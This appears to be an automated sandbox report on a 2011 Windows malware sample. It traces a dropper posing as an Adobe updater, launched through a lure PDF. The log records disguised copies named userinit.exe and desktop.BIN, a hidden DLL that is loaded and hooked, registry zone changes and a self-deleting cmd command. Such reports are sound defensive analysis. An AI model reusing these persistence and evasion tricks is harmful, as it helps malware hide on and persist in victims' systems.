File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: BF 07 07 89 B5 12 43 07 40 CF 16 48 BC 4A 61 11 9E E4 66 BC 9F 86 0D B0 05 8E C2 A7 78 E6 5B 90 DA 06 BB A1 13 F6 01 C5 7F 14 DE 81 4F E0 5B BC 7A 96 EB 1B 60 80 EE 30 24 C3 10 80 C8 37 91 6B 3D 9D F8 86 D1 D3 5E 64 0B 72 43 92 A4 5E 24 62 8E 7C D1 0F FB A2 67 4B C4 DC 13 4E 1E 0C A9 7C 6E 9A F8 21	success or wait	2086248411
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: F9 41 87 3B 31 29 76 B7 2A 57 D7 D0 91 3E 4B 35 D6 67 8D 24 5B AC D4 A1 60 F8 14 22 07 15 96 25 62 A6 99 17 71 39 2B 5F 91 CF C2 BD F5 D3 8E 29 B3 9D 1B 6C 46 49 16 2D 3A 85 65 0B 01 C9 83 1F 52 58 80 02 33 A6 8B B3 2C A3 85 05 92 2C 58 20 A6 86 AB 44 35 18 D5 C7 0E 32 3A 9B B3 88 89 74 6C AA B3 C8	success or wait	2086251733
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: B9 4C F6 71 3E 44 91 8A E7 6F 11 BB 90 3A 8B DA 27 43 47 DE DF B8 80 07 49 6C E3 F1 15 B4 6D 8A 1D 8F 57 5A 8B 7A 16 F1 A1 AE 18 D1 1C 95 80 FE 9C AB 6B 0B DE C4 B0 80 2F 79 F1 DF F8 62 6B B1 67 BB EF 6B 94 42 9D 3C 83 C5 F7 42 CD 43 1D 59 A0 56 63 A0 46 AE E7 D8 F5 BC 16 3F 76 0F E8 4B 1E 26 A3 82	success or wait	2086255141
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: DE 7A 4E C2 01 6F 3D 97 06 AC E2 1A 25 40 36 E9 1D 0B 9C F9 FC 8D 77 90 66 EB FE 2A 20 E8 07 A7 E8 5E AF B1 DF BA 0C E9 7C 46 2E F8 7D 63 48 DE E9 E3 D4 4D 7F 9D 75 9F 6A 7A 2F DE A7 CF 71 EE 0B 55 FE 5A DB 5D 38 E6 06 59 8E 95 CE C7 9C A3 2B F5 DF D1 D6 89 65 4C 26 85 98 A3 0A 50 18 8A A2 5E C6 FE	success or wait	2086258472
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: C0 88 52 23 E6 1B 51 62 44 B1 11 F3 8C 98 6B 44 91 11 85 46 14 18 91 6F 44 9E 11 B9 46 CC 31 62 B6 11 B3 8C C8 31 22 DB 88 2C 23 66 1A 31 C3 88 4C 23 FE 4B 63 5D 87 37 95 B4 61 18 EF 50 B4 69 A0 81 A4 48 DA 1E DC 5D 83 17 2B 52 68 29 F4 E0 4E A1 B8 04 82 07 0A 2C CB 0A EE EE 1E 74 70 77 77 77 77 77	success or wait	2086276779
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 3C FB 8A DD 17 F0 19 7C 02 1F 75 86 58 E1 83 CE 50 5F 78 8F DD 3B F0 16 BC C1 B3 D7 D8 BD 02 2F C1 0B 3C 7B 0E 9E E1 F0 29 78 02 1E 83 47 78 E5 21 76 0F B0 BB 8F DD 3D 70 17 DC C1 B3 DB E0 16 0E 6F 82 1B E0 3A B8 86 57 AE 62 77 05 5C D6 E9 1B 0A 97 74 FA 06 C2 45 70 01 87 E7 C1 39 70 16 9C C1 2B A7	success or wait	2086289166
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 3F 78 94 CF A3 AA 7A 54 61 8F 4A E2 E7 09 F2 64 F6 F8 07 F6 36 DD 66 2F 9F DB F4 73 D7 75 27 B8 D7 BA 93 96 5D EB BE E3 4E E2 E7 56 01 5B 7E EF 59 EF 76 86 45 88 E1 83 DC D6 A0 88 9E 66 77 B3 87 AF BB D9 AD 7D 57 B3 93 FC 58 1D 5D F1 66 07 5F BC D9 DE 15 67 B6 F3 C5 99 6D 5D 6D CC D6 AE 56 66 4B 57	success or wait	2086292599
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 4FF0000 Size: 49152 Protection: readonly Mapped to pid: own pid	success or wait	2086358733
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7F20000 Size: 352256 Protection: readonly Mapped to pid: own pid	success or wait	2086367045
Process created	PID: 1904 Path: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe Cmdline: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Createflags: 0	success or wait	2086371810

Analysis File: AdobeArm.tmp PID: 4076 Parent PID: 3208

+ Sections

+ General
Start time:	05:25:39
Start date:	02/12/2011
Path:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp
Commandline:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp
Imagebase:	0x400000
File size:	47104 bytes
MD5 hash:	4353E469D8B4A7BAE876C81D3CAAA0D1

File Activities:

+ File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows	read data or list directory and synchronize	normal	directory file and synchronous io non alert and open for backup ident	success or wait	1	40123A
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\logs\	read data or list directory and synchronize	normal	directory file and synchronous io non alert and open for backup ident	success or wait	1	401260
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	read attributes and synchronize and generic write	hidden and system	synchronous io non alert and non directory file	success or wait	1	401700

+ File copied
Old File Path	New File Path	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	C:\Documents and Settings\All Users\Application Data\desktop.BIN	success or wait	1	401371
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.exe	success or wait	1	4013A2

+ File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	none	38400	4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1	401718

Section Activities:

+ Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	unknown	7C800000	1007616	own pid	read write	success or wait	1
none	query and write and read and execute and extend size	reserve	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	unknown	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	unknown	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	unknown	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	unknown	320000	24576	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey00000409	read	unknown	320000	24576	own pid	readonly	object name not found	1
\NLS\NlsSectionSortkey00000409	read	unknown	320000	24576	own pid	readonly	object name not found	1
\KnownDlls\MSVCRT.dll	write and read and execute	unknown	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	unknown	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\iphlpapi.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	object name not found	1
C:\WINDOWS\system32\iphlpapi.dll	query and write and read and execute	image	76D60000	102400	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	unknown	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	unknown	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\WS2_32.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	object name not found	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
\KnownDlls\WS2HELP.dll	write and read and execute	unknown	71AB0000	94208	own pid	read write	object name not found	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	unknown	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	unknown	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\NETAPI32.dll	write and read and execute	unknown	77F60000	483328	own pid	read write	object name not found	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	unknown	340000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	8F0000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8F0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	390000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	390000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	read	commit	390000	4096	own pid	readonly	success or wait	1
\KnownDlls\comctl32.dll	write and read and execute	unknown	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8F0000	618496	own pid	readonly	success or wait	1
\KnownDlls\SAMLIB.dll	write and read and execute	unknown	8F0000	618496	own pid	readonly	object name not found	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	query and write and read and execute and extend size	commit	3C0000	49152	own pid	readonly	success or wait	1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	query and write and read and execute and extend size	commit	3C0000	49152	own pid	readonly	success or wait	1
none	query and write and read	commit	3C0000	16384	own pid	read write	success or wait	1
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	AF0000	401408	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	write and read and execute	commit	AF0000	299008	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	query and write and read and execute	image	74720000	311296	own pid	read write	success or wait	1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read	commit	74720000	311296	own pid	read write	object name exists	1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read and execute and extend size	unknown	AF0000	262144	own pid	read write	success or wait	1
\KnownDlls\SETUPAPI.dll	write and read and execute	unknown	AF0000	262144	own pid	read write	object name not found	1
C:\WINDOWS\system32\setupapi.dll	query and write and read and execute	image	77920000	995328	own pid	read write	success or wait	1
\KnownDlls\CLBCATQ.DLL	write and read and execute	unknown	77920000	995328	own pid	read write	object name not found	1
C:\WINDOWS\system32\clbcatq.dll	query and write and read and execute	image	76FD0000	520192	own pid	read write	success or wait	1
\KnownDlls\COMRes.dll	write and read and execute	unknown	76FD0000	520192	own pid	read write	object name not found	1
C:\WINDOWS\system32\comres.dll	query and write and read and execute	image	77050000	806912	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	success or wait	1
\BaseNamedObjects\Local\UrlZonesSM_Administrator	query and write and read	commit	77C00000	32768	own pid	read write	object name exists	1
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	B50000	389120	own pid	execute	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and read	commit	B50000	389120	own pid	readonly	success or wait	1
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	B50000	389120	own pid	execute	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and read	commit	B50000	389120	own pid	readonly	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and write and read and execute and extend size	image	B50000	389120	own pid	readonly	success or wait	1
\BaseNamedObjects\ShimSharedMemory	write	unknown	B50000	57344	own pid	read write	success or wait	1
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	B60000	126976	own pid	execute	success or wait	1
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	B60000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	C90000	389120	own pid	execute	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and read	commit	C90000	389120	own pid	readonly	success or wait	1
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	C90000	389120	own pid	execute	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and read	commit	C90000	389120	own pid	readonly	success or wait	1
C:\WINDOWS\system32\cmd.exe	query and read	commit	B60000	389120	own pid	readonly	success or wait	1
none	query and write and read	commit	B70000	4096	own pid	read write	success or wait	1

+ Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	write and read and execute	commit	3C0000	40960	own pid	execute	success or wait	1	40144D
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	query and write and read and execute	image	10000000	176128	own pid	read write	success or wait	1	40144D
\KnownDlls\WININET.dll	write and read and execute	unknown	3D930000	942080	own pid	read write	success or wait	1	40144D
\KnownDlls\Normaliz.dll	write and read and execute	unknown	3C0000	36864	own pid	read write	conflicting addresses	1	40144D
\KnownDlls\urlmon.dll	write and read and execute	unknown	78130000	1257472	own pid	read write	success or wait	1	40144D
\KnownDlls\ole32.dll	write and read and execute	unknown	774E0000	1302528	own pid	read write	success or wait	1	40144D
\KnownDlls\OLEAUT32.dll	write and read and execute	unknown	77120000	569344	own pid	read write	success or wait	1	40144D
\KnownDlls\iertutil.dll	write and read and execute	unknown	3DFD0000	2002944	own pid	read write	success or wait	1	40144D
\KnownDlls\CRYPT32.dll	write and read and execute	unknown	3DFD0000	2002944	own pid	read write	object name not found	1	40144D
C:\WINDOWS\system32\crypt32.dll	query and write and read and execute	image	77A80000	610304	own pid	read write	success or wait	1	40144D
\KnownDlls\MSASN1.dll	write and read and execute	unknown	77A80000	610304	own pid	read write	object name not found	1	40144D
C:\WINDOWS\system32\msasn1.dll	query and write and read and execute	image	77B20000	73728	own pid	read write	success or wait	1	40144D
\KnownDlls\MPR.dll	write and read and execute	unknown	71B20000	73728	own pid	read write	success or wait	1	40144D

Registry Activities:

+ Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Personal	String	C:\Documents and Settings\Administrator\My Documents	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f}	BaseClass	String	Drive	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e9036068-1842-11df-9766-806d6172696f}	BaseClass	String	Drive	success or wait	1	401847
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Common Documents	String	C:\Documents and Settings\All Users\Documents	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Desktop	String	C:\Documents and Settings\Administrator\Desktop	success or wait	1	401847
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Common Desktop	String	C:\Documents and Settings\All Users\Desktop	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	ProxyBypass	Dword	1	success or wait	2	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	IntranetName	Dword	1	success or wait	2	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	UNCAsIntranet	Dword	1	success or wait	2	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	AutoDetect	Dword	1	success or wait	2	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	String	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	String	C:\Documents and Settings\Administrator\Cookies	success or wait	1	401847
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	C:\WINDOWS\system32\cmd.exe	String	Windows Command Processor	success or wait	1	401847

Process Activities:

+ Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
2172	C:\WINDOWS\system32\cmd.exe	C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp > nul	0	success or wait	1	401847

Thread Activities:

+ Thread delayed
TID	Delay	Completion	Count	Source Address
16512	0s	success or wait	2	401423

Memory Activities:

+ Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
4076	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	149000	12DA50	page read and write	success or wait	1	4016B6

System Activities:

+ System information queried
System info class	Completion	Count	Source Address
ProcessInformation	success or wait	1	40151A

User Activities:

+ Window hook set
Module	Thread id	Hook code	Completion	Count	Source Address
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	0	debug	success	1	10003E9B

+ Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2086345936
Section loaded	Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2086396398
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2086471941
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2086483222
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2086488643
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	2086745680
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2086752345
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2086762079
Section loaded	Path: \KnownDlls\MSVCRT.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	2086946455
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	2087131541
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	2087132872
Section loaded	Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	object name not found	2087142681
Section loaded	Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid	success or wait	2087146596
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	2087154386
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	2087590329
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	2087650545
Section loaded	Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	object name not found	2088318982
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	2088331437
Section loaded	Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	object name not found	2088409644
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	2088783225
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	2088992810
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	2089027106
Section loaded	Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	object name not found	2089043010
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	2089045841
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 340000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2089273087
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2089667644
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2089921543
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	2090141698
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 8F0000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	2091098459
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8F0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	2091306854
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	2091315549
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	2091477888
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2091479273
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2091486438
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	2091515201
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8F0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	2091726977
Section loaded	Path: \KnownDlls\SAMLIB.dll Access: write and read and execute Type: unknown Baseaddress: 8F0000 Size: 618496 Protection: readonly Mapped to pid: own pid	object name not found	2091796486
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	2092180319
File created	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false	success or wait	2093115932
File created	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\logs\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false	success or wait	2093120690
Memory allocated	PID: 4076 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Base: 149000 Length: 12DA50 Allocation Type: null Protection: page read and write	success or wait	2093141256
File created	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: hidden and system Content Overwritten: false	success or wait	2093150686
File write	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll Offset: none Length: 38400 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	2093169806
Section loaded	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: query and write and read and execute and extend size Type: commit Baseaddress: 3C0000 Size: 49152 Protection: readonly Mapped to pid: own pid	success or wait	2093534533
File copied	From: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp to: C:\Documents and Settings\All Users\Application Data\desktop.BIN	success or wait	2093671805
Section loaded	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: query and write and read and execute and extend size Type: commit Baseaddress: 3C0000 Size: 49152 Protection: readonly Mapped to pid: own pid	success or wait	2094181336
File copied	From: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp to: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.exe	success or wait	2094706772
Thread delayed	Time: 0 TID: 16512	success or wait	2095458123
Thread delayed	Time: 0 TID: 16512	success or wait	2095824426
System info queried	Type: ProcessInformation	success or wait	2096217369
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: 3C0000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	2096220078
Section loaded	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 40960 Protection: execute Mapped to pid: own pid	success or wait	2096249371
Section loaded	Path: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 176128 Protection: read write Mapped to pid: own pid	success or wait	2096260879
